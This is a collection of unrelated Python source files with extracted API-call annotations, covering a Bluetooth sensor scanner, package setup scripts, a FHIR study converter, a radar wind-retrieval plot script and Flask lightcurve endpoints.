stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE)
l_stdout, l_stderr = await l_proc.communicate()
logger.info(f'>>> {cmd!r} exited with {l_proc.returncode}')
if l_stdout:
logger.debug(f'>>> stdout: {l_stdout.decode()}')
if l_stderr:
                logger.error(f'>>> stderr: {l_stderr.decode()}')
# ------------------------------------------------------------------------------
async def _handle_data(self, *, data):
"""
Handles received data from the Bleak scanner
"""
if not data:
return
self._data_ts = get_sec()
try:
l_mdata = data.metadata['manufacturer_data']
for l_mfid in list(l_mdata.keys()):
if not self._mfids or l_mfid in self._mfids:
l_mfdata = l_mdata[l_mfid]
logger.debug(f'''>>> device:{self._device} mac:{data.address} rssi:{data.rssi} mfid:{l_mfid} mflen:{len(l_mfdata)} mfdata:{hex_string(data=l_mfdata, filler='')}''')
try:
await self._callback(bledata=BLEData(
mac = data.address,
rssi = data.rssi,
mfid = l_mfid,
mfdata = l_mfdata,
rawdata = data
))
except:
logger.exception(f'>>> exception')
pass
except:
logger.exception(f'>>> exception')
pass
# -------------------------------------------------------------------------------
async def run(self):
logger.info(f'>>> starting...')
try:
self._scanner_stop = asyncio.Event()
self._scanner_task = self._loop.create_task(_scanner(device=self._device, loop=self._loop, outqueue=self._inqueue, stopevent=self._scanner_stop))
self._schedule()
except:
logger.exception(f'>>> exception')
raise
while not self._stopevent.is_set():
try:
if (self._inqueue):
await self._handle_data(data=await self._inqueue.get())
else:
await asyncio.sleep(100)
except GeneratorExit:
logger.error(f'>>> GeneratorExit')
self._stopevent.set()
break
except asyncio.CancelledError:
self._stopevent.set()
logger.warning(f'>>> CanceledError')
break
except:
logger.exception(f'>>> exception')
break
# l_task.cancel()
# with suppress(asyncio.CancelledError):
# self._loop.run_until_complete(l_task)
self._scanner_stop.set()
await asyncio.sleep(0.2)
logger.info('>>> bleak completed')
return True
# -------------------------------------------------------------------------------
def stop(self):
logger.info(f'>>> bleak')
self._stopevent.set()
|
[
"asyncio.sleep",
"asyncio.Event",
"datetime.datetime.now",
"datetime.timedelta",
"platform.system",
"asyncio.create_subprocess_shell",
"asyncio.Queue",
"logging.getLogger"
] |
[((400, 429), 'logging.getLogger', 'logging.getLogger', (['"""ruuvitag"""'], {}), "('ruuvitag')\n", (417, 429), False, 'import logging\n'), ((553, 570), 'platform.system', 'platform.system', ([], {}), '()\n', (568, 570), False, 'import platform\n'), ((643, 660), 'platform.system', 'platform.system', ([], {}), '()\n', (658, 660), False, 'import platform\n'), ((1563, 1578), 'asyncio.Event', 'asyncio.Event', ([], {}), '()\n', (1576, 1578), False, 'import asyncio\n'), ((1813, 1828), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (1826, 1828), False, 'import asyncio\n'), ((4576, 4594), 'asyncio.sleep', 'asyncio.sleep', (['(1.0)'], {}), '(1.0)\n', (4589, 4594), False, 'import asyncio\n'), ((5032, 5049), 'platform.system', 'platform.system', ([], {}), '()\n', (5047, 5049), False, 'import platform\n'), ((7012, 7027), 'asyncio.Event', 'asyncio.Event', ([], {}), '()\n', (7025, 7027), False, 'import asyncio\n'), ((8106, 8124), 'asyncio.sleep', 'asyncio.sleep', (['(0.2)'], {}), '(0.2)\n', (8119, 8124), False, 'import asyncio\n'), ((4727, 4745), 'asyncio.sleep', 'asyncio.sleep', (['(1.0)'], {}), '(1.0)\n', (4740, 4745), False, 'import asyncio\n'), ((4845, 4863), 'asyncio.sleep', 'asyncio.sleep', (['(1.0)'], {}), '(1.0)\n', (4858, 4863), False, 'import asyncio\n'), ((5129, 5234), 'asyncio.create_subprocess_shell', 'asyncio.create_subprocess_shell', (['cmd'], {'stdout': 'asyncio.subprocess.PIPE', 'stderr': 'asyncio.subprocess.PIPE'}), '(cmd, stdout=asyncio.subprocess.PIPE, stderr\n =asyncio.subprocess.PIPE)\n', (5160, 5234), False, 'import asyncio\n'), ((7518, 7536), 'asyncio.sleep', 'asyncio.sleep', (['(100)'], {}), '(100)\n', (7531, 7536), False, 'import asyncio\n'), ((3132, 3141), 'datetime.datetime.now', '_dt.now', ([], {}), '()\n', (3139, 3141), True, 'from datetime import datetime as _dt, timedelta as _td\n'), ((3142, 3175), 'datetime.timedelta', '_td', ([], {'seconds': 'self._device_timeout'}), '(seconds=self._device_timeout)\n', (3145, 3175), True, 'from datetime import datetime as _dt, timedelta as _td\n')]
|
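A rough driver sketch for the scanner class above. The callback keyword (bledata) follows the _handle_data call in the class; the event-loop handling and the Ruuvi manufacturer id are assumptions.

# Hypothetical driver for ruuvitag_bleak; names and values are assumed.
import asyncio

async def on_data(*, bledata):
    # assumes BLEData exposes its constructor fields as attributes
    print(bledata.mac, bledata.rssi, bledata.mfid)

loop = asyncio.get_event_loop()
tag = ruuvitag_bleak(loop=loop, callback=on_data, device='hci0',
                     mfids=[0x0499])  # 0x0499: Ruuvi's manufacturer id (assumed)
try:
    loop.run_until_complete(tag.run())
except KeyboardInterrupt:
    tag.stop()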
import os
import setuptools
from rex import __version__
readme_filepath = os.path.join(os.path.dirname(os.path.abspath(__file__)), "README.md")
with open(readme_filepath, "r") as fh:
long_description = fh.read()
setuptools.setup(
name="pytorch-rex",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="A toolkit for Relation Extraction and more...",
long_description_content_type="text/markdown",
long_description=long_description,
url="https://github.com/Spico197/REx",
packages=setuptools.find_packages(exclude=["tests", "tests.*", "docs", "docs.*"]),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.7",
install_requires=[
"numpy>=1.19.0",
"scikit-learn>=0.21.3",
"omegaconf>=2.0.6",
"loguru==0.5.3",
"tqdm==4.61.1",
],
# package_data={
# 'rex' : [
# 'models/*.pth'
# ],
# },
# include_package_data=True,
)
|
[
"os.path.abspath",
"setuptools.find_packages"
] |
[((106, 131), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (121, 131), False, 'import os\n'), ((548, 620), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'exclude': "['tests', 'tests.*', 'docs', 'docs.*']"}), "(exclude=['tests', 'tests.*', 'docs', 'docs.*'])\n", (572, 620), False, 'import setuptools\n')]
|
"""
This module converts Kids First studies to FHIR kfdrc-research-study
(derived from FHIR ResearchStudy).
"""
from kf_lib_data_ingest.common.concept_schema import CONCEPT
from common.utils import make_identifier, make_select, get
RESOURCE_TYPE = "ResearchStudy"
def yield_kfdrc_research_studies(
eng, table, target_service_id, organizations, practitioner_roles, groups
):
for row in make_select(
eng,
table,
CONCEPT.STUDY.ID,
CONCEPT.INVESTIGATOR.INSTITUTION,
CONCEPT.INVESTIGATOR.NAME,
CONCEPT.STUDY.ATTRIBUTION,
CONCEPT.STUDY.SHORT_NAME,
CONCEPT.STUDY.AUTHORITY,
CONCEPT.STUDY.NAME,
):
study_id = get(row, CONCEPT.STUDY.ID)
institution = get(row, CONCEPT.INVESTIGATOR.INSTITUTION)
investigator_name = get(row, CONCEPT.INVESTIGATOR.NAME)
study_name = get(row, CONCEPT.STUDY.NAME)
attribution = get(row, CONCEPT.STUDY.ATTRIBUTION)
short_name = get(row, CONCEPT.STUDY.SHORT_NAME)
if not all((study_id, institution, investigator_name, study_name)):
continue
retval = {
"resourceType": RESOURCE_TYPE,
"id": make_identifier(RESOURCE_TYPE, study_id),
"meta": {
"profile": [
"http://fhir.kids-first.io/StructureDefinition/kfdrc-research-study"
]
},
"identifier": [
{
"system": "https://kf-api-dataservice.kidsfirstdrc.org/studies",
"value": target_service_id,
},
{
"system": "https://kf-api-dataservice.kidsfirstdrc.org/studies?external_id=",
"value": study_id,
},
],
"extension": [
{
"url": "http://fhir.kids-first.io/StructureDefinition/related-organization",
"extension": [
{
"url": "organization",
"valueReference": {
"reference": f'Organization/{organizations[institution]["id"]}'
},
}
],
}
],
"title": study_name,
"status": "completed",
"principalInvestigator": {
"reference": f'PractitionerRole/{practitioner_roles[(institution, investigator_name)]["id"]}'
},
}
if attribution:
retval["identifier"].append({"value": attribution})
if short_name:
retval["extension"].append(
{
"url": "http://fhir.kids-first.io/StructureDefinition/display-name",
"valueString": short_name,
}
)
if groups:
retval["enrollment"] = [
{"reference": f'Group/{group["id"]}'}
for group in groups.values()
]
yield retval
|
[
"common.utils.make_identifier",
"common.utils.make_select",
"common.utils.get"
] |
[((396, 605), 'common.utils.make_select', 'make_select', (['eng', 'table', 'CONCEPT.STUDY.ID', 'CONCEPT.INVESTIGATOR.INSTITUTION', 'CONCEPT.INVESTIGATOR.NAME', 'CONCEPT.STUDY.ATTRIBUTION', 'CONCEPT.STUDY.SHORT_NAME', 'CONCEPT.STUDY.AUTHORITY', 'CONCEPT.STUDY.NAME'], {}), '(eng, table, CONCEPT.STUDY.ID, CONCEPT.INVESTIGATOR.INSTITUTION,\n CONCEPT.INVESTIGATOR.NAME, CONCEPT.STUDY.ATTRIBUTION, CONCEPT.STUDY.\n SHORT_NAME, CONCEPT.STUDY.AUTHORITY, CONCEPT.STUDY.NAME)\n', (407, 605), False, 'from common.utils import make_identifier, make_select, get\n'), ((696, 722), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.ID'], {}), '(row, CONCEPT.STUDY.ID)\n', (699, 722), False, 'from common.utils import make_identifier, make_select, get\n'), ((745, 787), 'common.utils.get', 'get', (['row', 'CONCEPT.INVESTIGATOR.INSTITUTION'], {}), '(row, CONCEPT.INVESTIGATOR.INSTITUTION)\n', (748, 787), False, 'from common.utils import make_identifier, make_select, get\n'), ((816, 851), 'common.utils.get', 'get', (['row', 'CONCEPT.INVESTIGATOR.NAME'], {}), '(row, CONCEPT.INVESTIGATOR.NAME)\n', (819, 851), False, 'from common.utils import make_identifier, make_select, get\n'), ((873, 901), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.NAME'], {}), '(row, CONCEPT.STUDY.NAME)\n', (876, 901), False, 'from common.utils import make_identifier, make_select, get\n'), ((924, 959), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.ATTRIBUTION'], {}), '(row, CONCEPT.STUDY.ATTRIBUTION)\n', (927, 959), False, 'from common.utils import make_identifier, make_select, get\n'), ((981, 1015), 'common.utils.get', 'get', (['row', 'CONCEPT.STUDY.SHORT_NAME'], {}), '(row, CONCEPT.STUDY.SHORT_NAME)\n', (984, 1015), False, 'from common.utils import make_identifier, make_select, get\n'), ((1195, 1235), 'common.utils.make_identifier', 'make_identifier', (['RESOURCE_TYPE', 'study_id'], {}), '(RESOURCE_TYPE, study_id)\n', (1210, 1235), False, 'from common.utils import make_identifier, make_select, get\n')]
|
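Illustrative consumption of the generator above; the engine, table name, and lookup dictionaries are hypothetical placeholders standing in for objects the ingest pipeline would normally prepare.

# Hypothetical call; all inputs below are placeholders.
from sqlalchemy import create_engine

eng = create_engine("sqlite://")  # placeholder engine
organizations = {"Some Hospital": {"id": "org-1"}}
practitioner_roles = {("Some Hospital", "Dr. Example"): {"id": "pr-1"}}
groups = {}

for study in yield_kfdrc_research_studies(
    eng, "study_table", "SD_PLACEHOLDER", organizations,
    practitioner_roles, groups,
):
    print(study["id"], study["title"])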
import pyart
import pydda
from matplotlib import pyplot as plt
import numpy as np
berr_grid = pyart.io.read_grid("berr_Darwin_hires.nc")
cpol_grid = pyart.io.read_grid("cpol_Darwin_hires.nc")
sounding = pyart.io.read_arm_sonde(
"/home/rjackson/data/soundings/twpsondewnpnC3.b1.20060119.231600.custom.cdf")
print(berr_grid.projection)
print(cpol_grid.get_projparams())
u_back = sounding[1].u_wind
v_back = sounding[1].v_wind
z_back = sounding[1].height
#u_init, v_init, w_init = pydda.retrieval.make_constant_wind_field(cpol_grid, wind=(0.0,0.0,0.0), vel_field='VT')
u_init, v_init, w_init = pydda.retrieval.make_wind_field_from_profile(cpol_grid, sounding, vel_field='VT')
#u_init, v_init, w_init = pydda.retrieval.make_test_divergence_field(
# cpol_grid, 30, 9.0, 15e3, 20e3, 5, 0, -20e3, 0)
# Test mass continuity by putting convergence at surface and divergence aloft
berr_grid.fields['DT']['data'] = cpol_grid.fields['DT']['data']
# Step 1 - do iterations with just data
Grids = pydda.retrieval.get_dd_wind_field([berr_grid, cpol_grid], u_init,
v_init, w_init,u_back=u_back,
v_back=v_back, z_back=z_back,
Co=100.0, Cm=1500.0, vel_name='VT',
refl_field='DT', frz=5000.0,
filt_iterations=0,
mask_w_outside_opt=False)
plt.figure(figsize=(8,8))
pydda.vis.plot_horiz_xsection_barbs(Grids, 'DT', level=6,
vel_contours=[1, 4, 10])
plt.interactive(False)
cpol_z = cpol_grid.fields['DT']['data']
# The variables below are used by the plotting code but were never defined
# in the original script. These definitions are assumptions based on the
# Py-ART Grid point_x/point_z conventions and on the 'u'/'w' fields that
# pydda.retrieval.get_dd_wind_field adds to the returned grids.
cpol_x = cpol_grid.point_x['data'] / 1e3  # gate x coordinates [km] (assumed)
cpol_h = cpol_grid.point_z['data']  # gate heights [m] (assumed)
u = Grids[0].fields['u']  # retrieved zonal wind (assumed field name)
w = Grids[0].fields['w']  # retrieved vertical wind (assumed field name)
barb_density = 4  # thinning factors for the barbs (assumed values)
barb_density_vert = 4
lat_level=45
plt.figure(figsize=(10,10))
plt.pcolormesh(cpol_x[::,lat_level,::], cpol_h[::,lat_level,::],
cpol_z[::,lat_level,::],
cmap=pyart.graph.cm_colorblind.HomeyerRainbow)
plt.colorbar(label='Z [dBZ]')
plt.barbs(cpol_x[::barb_density_vert,lat_level,::barb_density],
cpol_h[::barb_density_vert,lat_level,::barb_density],
u['data'][::barb_density_vert,lat_level,::barb_density],
w['data'][::barb_density_vert,lat_level,::barb_density])
cs = plt.contour(cpol_x[::,lat_level,::], cpol_h[::,lat_level,::],
w['data'][::,lat_level,::], levels=np.arange(1,20,2),
                 linewidths=16, alpha=0.5)
plt.clabel(cs)
plt.xlabel('X [km]', fontsize=20)
plt.ylabel('Z [m]', fontsize=20)
plt.show()
|
[
"pyart.io.read_arm_sonde",
"matplotlib.pyplot.clabel",
"matplotlib.pyplot.show",
"matplotlib.pyplot.interactive",
"pyart.io.read_grid",
"matplotlib.pyplot.barbs",
"matplotlib.pyplot.colorbar",
"pydda.retrieval.get_dd_wind_field",
"matplotlib.pyplot.figure",
"numpy.arange",
"matplotlib.pyplot.pcolormesh",
"pydda.retrieval.make_wind_field_from_profile",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"pydda.vis.plot_horiz_xsection_barbs"
] |
[((95, 137), 'pyart.io.read_grid', 'pyart.io.read_grid', (['"""berr_Darwin_hires.nc"""'], {}), "('berr_Darwin_hires.nc')\n", (113, 137), False, 'import pyart\n'), ((150, 192), 'pyart.io.read_grid', 'pyart.io.read_grid', (['"""cpol_Darwin_hires.nc"""'], {}), "('cpol_Darwin_hires.nc')\n", (168, 192), False, 'import pyart\n'), ((205, 316), 'pyart.io.read_arm_sonde', 'pyart.io.read_arm_sonde', (['"""/home/rjackson/data/soundings/twpsondewnpnC3.b1.20060119.231600.custom.cdf"""'], {}), "(\n '/home/rjackson/data/soundings/twpsondewnpnC3.b1.20060119.231600.custom.cdf'\n )\n", (228, 316), False, 'import pyart\n'), ((597, 683), 'pydda.retrieval.make_wind_field_from_profile', 'pydda.retrieval.make_wind_field_from_profile', (['cpol_grid', 'sounding'], {'vel_field': '"""VT"""'}), "(cpol_grid, sounding, vel_field\n ='VT')\n", (641, 683), False, 'import pydda\n'), ((997, 1246), 'pydda.retrieval.get_dd_wind_field', 'pydda.retrieval.get_dd_wind_field', (['[berr_grid, cpol_grid]', 'u_init', 'v_init', 'w_init'], {'u_back': 'u_back', 'v_back': 'v_back', 'z_back': 'z_back', 'Co': '(100.0)', 'Cm': '(1500.0)', 'vel_name': '"""VT"""', 'refl_field': '"""DT"""', 'frz': '(5000.0)', 'filt_iterations': '(0)', 'mask_w_outside_opt': '(False)'}), "([berr_grid, cpol_grid], u_init, v_init,\n w_init, u_back=u_back, v_back=v_back, z_back=z_back, Co=100.0, Cm=\n 1500.0, vel_name='VT', refl_field='DT', frz=5000.0, filt_iterations=0,\n mask_w_outside_opt=False)\n", (1030, 1246), False, 'import pydda\n'), ((1500, 1526), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(8, 8)'}), '(figsize=(8, 8))\n', (1510, 1526), True, 'from matplotlib import pyplot as plt\n'), ((1526, 1613), 'pydda.vis.plot_horiz_xsection_barbs', 'pydda.vis.plot_horiz_xsection_barbs', (['Grids', '"""DT"""'], {'level': '(6)', 'vel_contours': '[1, 4, 10]'}), "(Grids, 'DT', level=6, vel_contours=[1, \n 4, 10])\n", (1561, 1613), False, 'import pydda\n'), ((1646, 1668), 'matplotlib.pyplot.interactive', 'plt.interactive', (['(False)'], {}), '(False)\n', (1661, 1668), True, 'from matplotlib import pyplot as plt\n'), ((1723, 1751), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (1733, 1751), True, 'from matplotlib import pyplot as plt\n'), ((1751, 1891), 'matplotlib.pyplot.pcolormesh', 'plt.pcolormesh', (['cpol_x[:, lat_level, :]', 'cpol_h[:, lat_level, :]', 'cpol_z[:,\n lat_level, :]'], {'cmap': 'pyart.graph.cm_colorblind.HomeyerRainbow'}), '(cpol_x[:, lat_level, :], cpol_h[:, lat_level, :], cpol_z[:,\n lat_level, :], cmap=pyart.graph.cm_colorblind.HomeyerRainbow)\n', (1765, 1891), True, 'from matplotlib import pyplot as plt\n'), ((1920, 1949), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'label': '"""Z [dBZ]"""'}), "(label='Z [dBZ]')\n", (1932, 1949), True, 'from matplotlib import pyplot as plt\n'), ((1950, 2204), 'matplotlib.pyplot.barbs', 'plt.barbs', (['cpol_x[::barb_density_vert, lat_level, ::barb_density]', 'cpol_h[::barb_density_vert, lat_level, ::barb_density]', "u['data'][::barb_density_vert, lat_level, ::barb_density]", "w['data'][::barb_density_vert, lat_level, ::barb_density]"], {}), "(cpol_x[::barb_density_vert, lat_level, ::barb_density], cpol_h[::\n barb_density_vert, lat_level, ::barb_density], u['data'][::\n barb_density_vert, lat_level, ::barb_density], w['data'][::\n barb_density_vert, lat_level, ::barb_density])\n", (1959, 2204), True, 'from matplotlib import pyplot as plt\n'), ((2396, 2410), 'matplotlib.pyplot.clabel', 'plt.clabel', (['cs'], {}), '(cs)\n', (2406, 2410), True, 'from matplotlib import pyplot as plt\n'), ((2411, 2444), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X [km]"""'], {'fontsize': '(20)'}), "('X [km]', fontsize=20)\n", (2421, 2444), True, 'from matplotlib import pyplot as plt\n'), ((2445, 2477), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Z [m]"""'], {'fontsize': '(20)'}), "('Z [m]', fontsize=20)\n", (2455, 2477), True, 'from matplotlib import pyplot as plt\n'), ((2478, 2488), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2486, 2488), True, 'from matplotlib import pyplot as plt\n'), ((2334, 2353), 'numpy.arange', 'np.arange', (['(1)', '(20)', '(2)'], {}), '(1, 20, 2)\n', (2343, 2353), True, 'import numpy as np\n')]
|
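The strided slicing used in the barb plot above, isolated on a small array to show what the thinning factors do:

# Strided slicing demo: every 2nd index on axes 0 and 2, fixed index on axis 1.
import numpy as np

a = np.arange(24).reshape(2, 3, 4)
print(a[::2, 1, ::2].shape)  # -> (1, 2)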
def make_get_toks(f=None):
"make iterator and next functions out of iterable of split strings"
from sys import stdin
from itertools import chain
def sp(ln):
"to split the strings with a map"
return ln.split()
def the_it():
"so that both results are callable in similar manner"
return it
if f is None:
f = stdin
it = chain.from_iterable(map(sp, f))
return the_it, it.__next__
get_toks, get_tok = make_get_toks()
from collections import defaultdict as dd
n, k = int(get_tok()), int(get_tok())
d = dd(int)
on = True
for m in get_toks():
m = int(m)
if m % n == 0:
d[m] += 1
if d[m] >= k and on:
print(m)
on = False
if on:
print("none")
|
[
"collections.defaultdict"
] |
[((577, 584), 'collections.defaultdict', 'dd', (['int'], {}), '(int)\n', (579, 584), True, 'from collections import defaultdict as dd\n')]
|
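The token-stream trick in make_get_toks, shown in isolation on a literal file-like object (the input values here are made up):

# chain.from_iterable flattens the per-line token lists into one stream.
from io import StringIO
from itertools import chain

toks = chain.from_iterable(line.split() for line in StringIO("3 2\n3 6\n6 9 9"))
assert next(toks) == "3" and next(toks) == "2"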
from flask_restx import Namespace, Resource
from .parsers import survey_id_parser
from .models import (
light_curve_model,
detection_model,
non_detection_model,
)
from dependency_injector.wiring import inject, Provide
from dependency_injector.providers import Factory
from api.container import AppContainer
from shared.interface.command import Command
from shared.interface.command import ResultHandler
from core.light_curve.domain.lightcurve_service import LightcurveServicePayload
from ralidator_flask.decorators import (
set_permissions_decorator,
set_filters_decorator,
check_permissions_decorator,
)
api = Namespace("lightcurve", description="LightCurve related operations")
api.models[light_curve_model.name] = light_curve_model
api.models[detection_model.name] = detection_model
api.models[non_detection_model.name] = non_detection_model
@api.route("/<id>/lightcurve")
@api.param("id", "The object's identifier")
@api.response(200, "Success")
@api.response(404, "Not found")
class LightCurve(Resource):
@set_permissions_decorator(["admin", "basic_user"])
@set_filters_decorator(["filter_atlas_lightcurve"])
@check_permissions_decorator
@api.doc("lightcurve")
@api.marshal_with(light_curve_model, skip_none=True)
@api.expect(survey_id_parser)
@inject
def get(
self,
id,
command_factory: Factory[Command] = Provide[
AppContainer.lightcurve_package.get_lightcurve_command.provider
],
result_handler: ResultHandler = Provide[
AppContainer.view_result_handler
],
):
"""
Gets detections and non detections
"""
survey_id = survey_id_parser.parse_args()["survey_id"]
command = command_factory(
payload=LightcurveServicePayload(id, survey_id),
handler=result_handler,
)
command.execute()
return result_handler.result
@api.route("/<id>/detections")
@api.param("id", "The object's identifier")
@api.response(200, "Success")
@api.response(404, "Not found")
class ObjectDetections(Resource):
@set_permissions_decorator(["admin", "basic_user"])
@set_filters_decorator(["filter_atlas_detections"])
@check_permissions_decorator
@api.doc("detections")
@api.marshal_list_with(detection_model, skip_none=True)
@api.expect(survey_id_parser)
@inject
def get(
self,
id,
command_factory: Factory[Command] = Provide[
AppContainer.lightcurve_package.get_detections_command.provider
],
result_handler: ResultHandler = Provide[
AppContainer.view_result_handler
],
):
"""
Just the detections
"""
survey_id = survey_id_parser.parse_args()["survey_id"]
command = command_factory(
payload=LightcurveServicePayload(id, survey_id),
handler=result_handler,
)
command.execute()
return result_handler.result
@api.route("/<id>/non_detections")
@api.param("id", "The object's identifier")
@api.response(200, "Success")
@api.response(404, "Not found")
class NonDetections(Resource):
@set_permissions_decorator(["admin", "basic_user"])
@set_filters_decorator(["filter_atlas_non_detections"])
@check_permissions_decorator
@api.doc("non_detections")
@api.marshal_list_with(non_detection_model, skip_none=True)
@api.expect(survey_id_parser)
@inject
def get(
self,
id,
command_factory: Factory[Command] = Provide[
AppContainer.lightcurve_package.get_non_detections_command.provider
],
result_handler: ResultHandler = Provide[
AppContainer.view_result_handler
],
):
"""
Just non detections
"""
survey_id = survey_id_parser.parse_args()["survey_id"]
command = command_factory(
payload=LightcurveServicePayload(id, survey_id),
handler=result_handler,
)
command.execute()
return result_handler.result
|
[
"ralidator_flask.decorators.set_permissions_decorator",
"flask_restx.Namespace",
"core.light_curve.domain.lightcurve_service.LightcurveServicePayload",
"ralidator_flask.decorators.set_filters_decorator"
] |
[((636, 704), 'flask_restx.Namespace', 'Namespace', (['"""lightcurve"""'], {'description': '"""LightCurve related operations"""'}), "('lightcurve', description='LightCurve related operations')\n", (645, 704), False, 'from flask_restx import Namespace, Resource\n'), ((1042, 1092), 'ralidator_flask.decorators.set_permissions_decorator', 'set_permissions_decorator', (["['admin', 'basic_user']"], {}), "(['admin', 'basic_user'])\n", (1067, 1092), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((1098, 1148), 'ralidator_flask.decorators.set_filters_decorator', 'set_filters_decorator', (["['filter_atlas_lightcurve']"], {}), "(['filter_atlas_lightcurve'])\n", (1119, 1148), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((2116, 2166), 'ralidator_flask.decorators.set_permissions_decorator', 'set_permissions_decorator', (["['admin', 'basic_user']"], {}), "(['admin', 'basic_user'])\n", (2141, 2166), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((2172, 2222), 'ralidator_flask.decorators.set_filters_decorator', 'set_filters_decorator', (["['filter_atlas_detections']"], {}), "(['filter_atlas_detections'])\n", (2193, 2222), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((3179, 3229), 'ralidator_flask.decorators.set_permissions_decorator', 'set_permissions_decorator', (["['admin', 'basic_user']"], {}), "(['admin', 'basic_user'])\n", (3204, 3229), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((3235, 3289), 'ralidator_flask.decorators.set_filters_decorator', 'set_filters_decorator', (["['filter_atlas_non_detections']"], {}), "(['filter_atlas_non_detections'])\n", (3256, 3289), False, 'from ralidator_flask.decorators import set_permissions_decorator, set_filters_decorator, check_permissions_decorator\n'), ((1788, 1827), 'core.light_curve.domain.lightcurve_service.LightcurveServicePayload', 'LightcurveServicePayload', (['id', 'survey_id'], {}), '(id, survey_id)\n', (1812, 1827), False, 'from core.light_curve.domain.lightcurve_service import LightcurveServicePayload\n'), ((2850, 2889), 'core.light_curve.domain.lightcurve_service.LightcurveServicePayload', 'LightcurveServicePayload', (['id', 'survey_id'], {}), '(id, survey_id)\n', (2874, 2889), False, 'from core.light_curve.domain.lightcurve_service import LightcurveServicePayload\n'), ((3929, 3968), 'core.light_curve.domain.lightcurve_service.LightcurveServicePayload', 'LightcurveServicePayload', (['id', 'survey_id'], {}), '(id, survey_id)\n', (3953, 3968), False, 'from core.light_curve.domain.lightcurve_service import LightcurveServicePayload\n')]
|
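A stripped-down sketch of the dependency-injector wiring pattern used above, assuming the dependency_injector package; the container and provider names are hypothetical.

import sys
from dependency_injector import containers, providers
from dependency_injector.wiring import Provide, inject

class Container(containers.DeclarativeContainer):
    greeting = providers.Factory(str, "hello")  # hypothetical provider

@inject
def handler(msg: str = Provide[Container.greeting]):
    return msg

container = Container()
container.wire(modules=[sys.modules[__name__]])  # wiring makes Provide[...] resolve
print(handler())  # -> "hello"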
#!/usr/bin/env python
"""Setup.py for eulxml package"""
from distutils.command.build_py import build_py
from distutils.command.clean import clean
from distutils.command.sdist import sdist
from distutils.core import Command
import os
import sys
import shutil
from setuptools import setup, find_packages
import eulxml
class GenerateXmlCatalog(Command):
'''Custom setup command to generate fresh catalog and schemas'''
user_options = []
def initialize_options(self):
"""init options"""
pass
def finalize_options(self):
"""finalize options"""
pass
def run(self):
from eulxml.catalog import generate_catalog
generate_catalog()
def generate_catalog_if_needed():
# helper method to check if catalog is present, and generate if not
if not os.path.exists(eulxml.XMLCATALOG_FILE):
from eulxml.catalog import generate_catalog
print("Cenerating XML catalog...")
generate_catalog()
class CleanSchemaData(clean):
"""Custom cleanup command to delete build and schema files"""
description = "Custom clean command; remove schema files and XML catalog"
def run(self):
# remove schema data and then do any other normal cleaning
try:
shutil.rmtree(eulxml.XMLCATALOG_DIR)
except OSError:
pass
clean.run(self)
class BuildPyWithPly(build_py):
"""Use ply to generate parsetab and lextab modules."""
def run(self):
# importing this forces ply to generate parsetab/lextab
import eulxml.xpath.core
generate_catalog_if_needed()
build_py.run(self)
class SdistWithCatalog(sdist):
"""Extend sdist command to ensure schema catalog is included."""
def run(self):
generate_catalog_if_needed()
sdist.run(self)
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Text Processing :: Markup :: XML',
]
LONG_DESCRIPTION = None
try:
# read the description if it's there
with open('README.rst') as desc_f:
LONG_DESCRIPTION = desc_f.read()
except:
pass
dev_requirements = [
'sphinx>=1.3.5',
'coverage',
'Django<1.9',
'rdflib>=3.0',
'mock',
'nose',
'tox',
'requests',
]
# NOTE: dev requirements should be duplicated in pip-dev-req.txt
# for generating documentation on readthedocs.org
# unittest2 should only be included for py2.6
if sys.version_info < (2, 7):
dev_requirements.append('unittest2')
setup(
cmdclass={
'build_py': BuildPyWithPly,
'clean': CleanSchemaData,
'sdist': SdistWithCatalog,
'xmlcatalog': GenerateXmlCatalog
},
name='eulxml',
version=eulxml.__version__,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/emory-libraries/eulxml',
license='Apache License, Version 2.0',
packages=find_packages(),
setup_requires=[
'ply>=3.8',
],
install_requires=[
'ply>=3.8',
'lxml>=3.4',
'six>=1.10',
],
extras_require={
'django': ['Django<1.9'],
'rdf': ['rdflib>=3.0'],
'dev': dev_requirements
},
package_data={'eulxml': [
# include schema catalog and all downloaded schemas in the package
'%s/*' % eulxml.SCHEMA_DATA_DIR
]},
description='XPath-based XML data binding, with Django form support',
long_description=LONG_DESCRIPTION,
classifiers=CLASSIFIERS,
)
|
[
"distutils.command.build_py.build_py.run",
"distutils.command.clean.clean.run",
"os.path.exists",
"distutils.command.sdist.sdist.run",
"shutil.rmtree",
"eulxml.catalog.generate_catalog",
"setuptools.find_packages"
] |
